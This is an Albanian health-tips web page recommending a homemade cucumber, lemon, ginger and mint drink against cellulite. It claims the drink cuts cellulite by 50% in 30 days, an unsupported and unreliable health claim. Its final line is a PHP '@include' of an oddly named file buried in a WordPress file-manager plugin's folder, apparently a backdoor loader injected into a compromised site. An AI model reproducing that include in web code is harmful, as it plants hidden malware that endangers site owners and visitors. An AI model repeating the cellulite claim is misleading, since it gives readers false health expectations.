Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

KËSHILLA MJEKËSORE!

KËSHILLA MJEKËSORE!

dieta ne islam

KËSHILLA MJEKËSORE!

 

Celuliti eshte armiku me i keq i çdo gruaje dhe lufta ndaj tij eshte shume e veshtire.

Ketu do te gjeni nje pije te bere vete qe lufton celulitin.

Pija qe ne propozojme eshte e varfer ne kalori dhe mund te kete efekte pozitive ne te gjithe trupin, por sidomos tek linjat e trupit. Ajo gjithashtu zvogelon ndjenjen e urise, duke bere qe ju te konsumoni me pak. Ajo permban vitamina, minerale dhe antioksidante, dhe eshte plotesisht natyrale.

 

Ja se cilet jane perberesit e nevojshem per te krijuar kete pije mrekulli:

– nje kastravec

– nje limon

– 2 luge xhenxhefil

– 10 gjethe mente

– 500 ml uje natyral

Pergatitja:

 

Pritini limonin dhe kastravecet ne feta. Vendosini ne nje kavanoz me uje, gjithashtu shtoni xinxerfillin dhe gjethet e mentes. Me pas enen vendoseni ne frigorifer dhe lereni per nje nate. Kjo pije do te zvogeloje celulitin me 50% ne 30 dite.

 

 

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";